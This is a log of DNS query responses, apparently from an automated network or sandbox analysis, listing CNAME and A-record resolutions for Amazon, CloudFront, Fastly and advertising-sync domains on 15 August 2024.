                                                                                                                                                                                                        Aug 15, 2024 15:38:44.249187946 CEST1.1.1.1192.168.2.40xdcecNo error (0)eu-west-1-sync.ads.yieldmo.comsync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.249187946 CEST1.1.1.1192.168.2.40xdcecNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com52.214.238.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.249187946 CEST1.1.1.1192.168.2.40xdcecNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com63.33.53.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.249187946 CEST1.1.1.1192.168.2.40xdcecNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com54.76.69.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.249187946 CEST1.1.1.1192.168.2.40xdcecNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com52.31.121.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.249187946 CEST1.1.1.1192.168.2.40xdcecNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com34.254.83.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.249187946 CEST1.1.1.1192.168.2.40xdcecNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com52.211.109.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.250061989 CEST1.1.1.1192.168.2.40x114bNo error (0)sync-amazon.ads.yieldmo.comsync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.250061989 CEST1.1.1.1192.168.2.40x114bNo error (0)sync.ads.yieldmo.comeu-west-1-sync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.250061989 CEST1.1.1.1192.168.2.40x114bNo error (0)eu-west-1-sync.ads.yieldmo.comsync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:45.264414072 CEST1.1.1.1192.168.2.40xa979No error (0)static.siege-amazon.com18.239.83.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:45.264414072 CEST1.1.1.1192.168.2.40xa979No error (0)static.siege-amazon.com18.239.83.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:45.264414072 CEST1.1.1.1192.168.2.40xa979No error (0)static.siege-amazon.com18.239.83.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:45.264414072 CEST1.1.1.1192.168.2.40xa979No error (0)static.siege-amazon.com18.239.83.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:47.860384941 CEST1.1.1.1192.168.2.40x271cNo error (0)static.siege-amazon.com18.239.83.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:47.860384941 CEST1.1.1.1192.168.2.40x271cNo error (0)static.siege-amazon.com18.239.83.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:47.860384941 CEST1.1.1.1192.168.2.40x271cNo error (0)static.siege-amazon.com18.239.83.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:47.860384941 CEST1.1.1.1192.168.2.40x271cNo error (0)static.siege-amazon.com18.239.83.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.829382896 CEST1.1.1.1192.168.2.40x7590No error (0)unagi-na.amazon.com44.215.136.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.829382896 CEST1.1.1.1192.168.2.40x7590No error (0)unagi-na.amazon.com44.215.133.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.829382896 CEST1.1.1.1192.168.2.40x7590No error (0)unagi-na.amazon.com44.215.132.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.829382896 CEST1.1.1.1192.168.2.40x7590No error (0)unagi-na.amazon.com44.215.137.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.829382896 CEST1.1.1.1192.168.2.40x7590No error (0)unagi-na.amazon.com44.215.129.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.829382896 CEST1.1.1.1192.168.2.40x7590No error (0)unagi-na.amazon.com44.215.137.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.829382896 CEST1.1.1.1192.168.2.40x7590No error (0)unagi-na.amazon.com44.215.141.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.829382896 CEST1.1.1.1192.168.2.40x7590No error (0)unagi-na.amazon.com44.215.129.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.834204912 CEST1.1.1.1192.168.2.40xfce6No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.834204912 CEST1.1.1.1192.168.2.40xfce6No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.834253073 CEST1.1.1.1192.168.2.40xa5c7No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.834253073 CEST1.1.1.1192.168.2.40xa5c7No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.834253073 CEST1.1.1.1192.168.2.40xa5c7No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.208.235.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.834253073 CEST1.1.1.1192.168.2.40xa5c7No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.210.127.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.834253073 CEST1.1.1.1192.168.2.40xa5c7No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.209.66.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.834253073 CEST1.1.1.1192.168.2.40xa5c7No error (0)endpoint.prod.eu-west-1.forester.a2z.com99.80.194.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.834253073 CEST1.1.1.1192.168.2.40xa5c7No error (0)endpoint.prod.eu-west-1.forester.a2z.com63.32.149.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.834253073 CEST1.1.1.1192.168.2.40xa5c7No error (0)endpoint.prod.eu-west-1.forester.a2z.com99.81.242.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.834253073 CEST1.1.1.1192.168.2.40xa5c7No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.194.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:50.834253073 CEST1.1.1.1192.168.2.40xa5c7No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.50.183.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:52.508816957 CEST1.1.1.1192.168.2.40x9dcdNo error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:52.508816957 CEST1.1.1.1192.168.2.40x9dcdNo error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:52.508816957 CEST1.1.1.1192.168.2.40x9dcdNo error (0)endpoint.prod.eu-west-1.forester.a2z.com54.77.103.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:52.508816957 CEST1.1.1.1192.168.2.40x9dcdNo error (0)endpoint.prod.eu-west-1.forester.a2z.com34.240.160.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:52.508816957 CEST1.1.1.1192.168.2.40x9dcdNo error (0)endpoint.prod.eu-west-1.forester.a2z.com54.73.209.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:52.508816957 CEST1.1.1.1192.168.2.40x9dcdNo error (0)endpoint.prod.eu-west-1.forester.a2z.com54.72.124.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:52.508816957 CEST1.1.1.1192.168.2.40x9dcdNo error (0)endpoint.prod.eu-west-1.forester.a2z.com34.246.123.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:52.508816957 CEST1.1.1.1192.168.2.40x9dcdNo error (0)endpoint.prod.eu-west-1.forester.a2z.com99.81.211.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:52.508816957 CEST1.1.1.1192.168.2.40x9dcdNo error (0)endpoint.prod.eu-west-1.forester.a2z.com52.30.162.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:52.508816957 CEST1.1.1.1192.168.2.40x9dcdNo error (0)endpoint.prod.eu-west-1.forester.a2z.com54.171.74.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:52.508898020 CEST1.1.1.1192.168.2.40x436eNo error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:52.508898020 CEST1.1.1.1192.168.2.40x436eNo error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:57.367921114 CEST1.1.1.1192.168.2.40x498cNo error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:57.367921114 CEST1.1.1.1192.168.2.40x498cNo error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:57.367921114 CEST1.1.1.1192.168.2.40x498cNo error (0)dlsq0ztllwnya.cloudfront.net3.164.163.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:57.367921114 CEST1.1.1.1192.168.2.40x498cNo error (0)dlsq0ztllwnya.cloudfront.net3.164.163.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:57.367921114 CEST1.1.1.1192.168.2.40x498cNo error (0)dlsq0ztllwnya.cloudfront.net3.164.163.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:57.367921114 CEST1.1.1.1192.168.2.40x498cNo error (0)dlsq0ztllwnya.cloudfront.net3.164.163.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:57.382901907 CEST1.1.1.1192.168.2.40xe2c7No error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:57.382901907 CEST1.1.1.1192.168.2.40xe2c7No error (0)tp.c9a5976c7-frontier.amazon.aewww.amazon.ae.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:57.498578072 CEST1.1.1.1192.168.2.40x2874Name error (3)usermatch.krxd.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.498071909 CEST1.1.1.1192.168.2.40x2ed2No error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.498071909 CEST1.1.1.1192.168.2.40x2ed2No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.498071909 CEST1.1.1.1192.168.2.40x2ed2No error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.498071909 CEST1.1.1.1192.168.2.40x2ed2No error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.498071909 CEST1.1.1.1192.168.2.40x2ed2No error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.498071909 CEST1.1.1.1192.168.2.40x2ed2No error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.498071909 CEST1.1.1.1192.168.2.40x2ed2No error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.498071909 CEST1.1.1.1192.168.2.40x2ed2No error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.499366045 CEST1.1.1.1192.168.2.40x258aNo error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.499366045 CEST1.1.1.1192.168.2.40x258aNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.499366045 CEST1.1.1.1192.168.2.40x258aNo error (0)tp.c47710ee9-frontier.media-amazon.coma.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.499366045 CEST1.1.1.1192.168.2.40x258aNo error (0)a.media-amazon.coma.media-amazon.com.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.548753023 CEST1.1.1.1192.168.2.40x3609No error (0)d1nruqhae353qc.cloudfront.net18.245.200.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.548753023 CEST1.1.1.1192.168.2.40x3609No error (0)d1nruqhae353qc.cloudfront.net18.245.200.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.548753023 CEST1.1.1.1192.168.2.40x3609No error (0)d1nruqhae353qc.cloudfront.net18.245.200.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.548753023 CEST1.1.1.1192.168.2.40x3609No error (0)d1nruqhae353qc.cloudfront.net18.245.200.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.655303001 CEST1.1.1.1192.168.2.40xbd3eNo error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.655303001 CEST1.1.1.1192.168.2.40xbd3eNo error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.655303001 CEST1.1.1.1192.168.2.40xbd3eNo error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.714436054 CEST1.1.1.1192.168.2.40x9298No error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.714436054 CEST1.1.1.1192.168.2.40x9298No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.714436054 CEST1.1.1.1192.168.2.40x9298No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.714436054 CEST1.1.1.1192.168.2.40x9298No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.209.66.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.714436054 CEST1.1.1.1192.168.2.40x9298No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.155.30.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.714436054 CEST1.1.1.1192.168.2.40x9298No error (0)endpoint.prod.eu-west-1.forester.a2z.com18.200.214.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.714436054 CEST1.1.1.1192.168.2.40x9298No error (0)endpoint.prod.eu-west-1.forester.a2z.com34.251.46.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.714436054 CEST1.1.1.1192.168.2.40x9298No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.194.230.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.714436054 CEST1.1.1.1192.168.2.40x9298No error (0)endpoint.prod.eu-west-1.forester.a2z.com63.32.149.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.714436054 CEST1.1.1.1192.168.2.40x9298No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.208.235.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.714436054 CEST1.1.1.1192.168.2.40x9298No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.76.214.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.773387909 CEST1.1.1.1192.168.2.40xad47No error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.773387909 CEST1.1.1.1192.168.2.40xad47No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.773387909 CEST1.1.1.1192.168.2.40xad47No error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.773387909 CEST1.1.1.1192.168.2.40xad47No error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.773900986 CEST1.1.1.1192.168.2.40x3451No error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.773900986 CEST1.1.1.1192.168.2.40x3451No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.773900986 CEST1.1.1.1192.168.2.40x3451No error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.773900986 CEST1.1.1.1192.168.2.40x3451No error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.773900986 CEST1.1.1.1192.168.2.40x3451No error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.773900986 CEST1.1.1.1192.168.2.40x3451No error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.773900986 CEST1.1.1.1192.168.2.40x3451No error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:58.773900986 CEST1.1.1.1192.168.2.40x3451No error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:00.151875973 CEST1.1.1.1192.168.2.40x837dNo error (0)d2h8zr0m6mus4x.cloudfront.net13.32.118.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:00.151875973 CEST1.1.1.1192.168.2.40x837dNo error (0)d2h8zr0m6mus4x.cloudfront.net13.32.118.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:00.151875973 CEST1.1.1.1192.168.2.40x837dNo error (0)d2h8zr0m6mus4x.cloudfront.net13.32.118.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:00.151875973 CEST1.1.1.1192.168.2.40x837dNo error (0)d2h8zr0m6mus4x.cloudfront.net13.32.118.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:01.174689054 CEST1.1.1.1192.168.2.40xf97dNo error (0)d1nruqhae353qc.cloudfront.net13.225.84.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:01.174689054 CEST1.1.1.1192.168.2.40xf97dNo error (0)d1nruqhae353qc.cloudfront.net13.225.84.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:01.174689054 CEST1.1.1.1192.168.2.40xf97dNo error (0)d1nruqhae353qc.cloudfront.net13.225.84.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:01.174689054 CEST1.1.1.1192.168.2.40xf97dNo error (0)d1nruqhae353qc.cloudfront.net13.225.84.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.099608898 CEST1.1.1.1192.168.2.40xc81No error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.099608898 CEST1.1.1.1192.168.2.40xc81No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.099608898 CEST1.1.1.1192.168.2.40xc81No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.100086927 CEST1.1.1.1192.168.2.40xdb6fNo error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.100086927 CEST1.1.1.1192.168.2.40xdb6fNo error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.100086927 CEST1.1.1.1192.168.2.40xdb6fNo error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.100086927 CEST1.1.1.1192.168.2.40xdb6fNo error (0)endpoint.prod.eu-west-1.forester.a2z.com52.208.211.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.100086927 CEST1.1.1.1192.168.2.40xdb6fNo error (0)endpoint.prod.eu-west-1.forester.a2z.com52.209.66.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.100086927 CEST1.1.1.1192.168.2.40xdb6fNo error (0)endpoint.prod.eu-west-1.forester.a2z.com54.78.35.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.100086927 CEST1.1.1.1192.168.2.40xdb6fNo error (0)endpoint.prod.eu-west-1.forester.a2z.com52.48.66.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.100086927 CEST1.1.1.1192.168.2.40xdb6fNo error (0)endpoint.prod.eu-west-1.forester.a2z.com54.76.214.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.100086927 CEST1.1.1.1192.168.2.40xdb6fNo error (0)endpoint.prod.eu-west-1.forester.a2z.com99.80.194.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.100086927 CEST1.1.1.1192.168.2.40xdb6fNo error (0)endpoint.prod.eu-west-1.forester.a2z.com52.213.182.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.100086927 CEST1.1.1.1192.168.2.40xdb6fNo error (0)endpoint.prod.eu-west-1.forester.a2z.com54.75.1.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.101341963 CEST1.1.1.1192.168.2.40x7b45No error (0)d2h8zr0m6mus4x.cloudfront.net13.224.98.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.101341963 CEST1.1.1.1192.168.2.40x7b45No error (0)d2h8zr0m6mus4x.cloudfront.net13.224.98.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.101341963 CEST1.1.1.1192.168.2.40x7b45No error (0)d2h8zr0m6mus4x.cloudfront.net13.224.98.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:03.101341963 CEST1.1.1.1192.168.2.40x7b45No error (0)d2h8zr0m6mus4x.cloudfront.net13.224.98.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:04.674834967 CEST1.1.1.1192.168.2.40xa935Name error (3)amazon.partners.tremorhub.comnonenone65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:04.674979925 CEST1.1.1.1192.168.2.40x65c3Name error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:04.683650970 CEST1.1.1.1192.168.2.40x219aName error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:05.419086933 CEST1.1.1.1192.168.2.40x27f9No error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:05.419086933 CEST1.1.1.1192.168.2.40x27f9No error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:05.419086933 CEST1.1.1.1192.168.2.40x27f9No error (0)dlsq0ztllwnya.cloudfront.net3.164.68.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:05.419086933 CEST1.1.1.1192.168.2.40x27f9No error (0)dlsq0ztllwnya.cloudfront.net3.164.68.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:05.419086933 CEST1.1.1.1192.168.2.40x27f9No error (0)dlsq0ztllwnya.cloudfront.net3.164.68.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:05.419086933 CEST1.1.1.1192.168.2.40x27f9No error (0)dlsq0ztllwnya.cloudfront.net3.164.68.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:05.437901974 CEST1.1.1.1192.168.2.40x5261No error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:05.437901974 CEST1.1.1.1192.168.2.40x5261No error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.272265911 CEST1.1.1.1192.168.2.40x262No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.272265911 CEST1.1.1.1192.168.2.40x262No error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:39:06.273185968 CEST1.1.1.1192.168.2.40xfaabNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
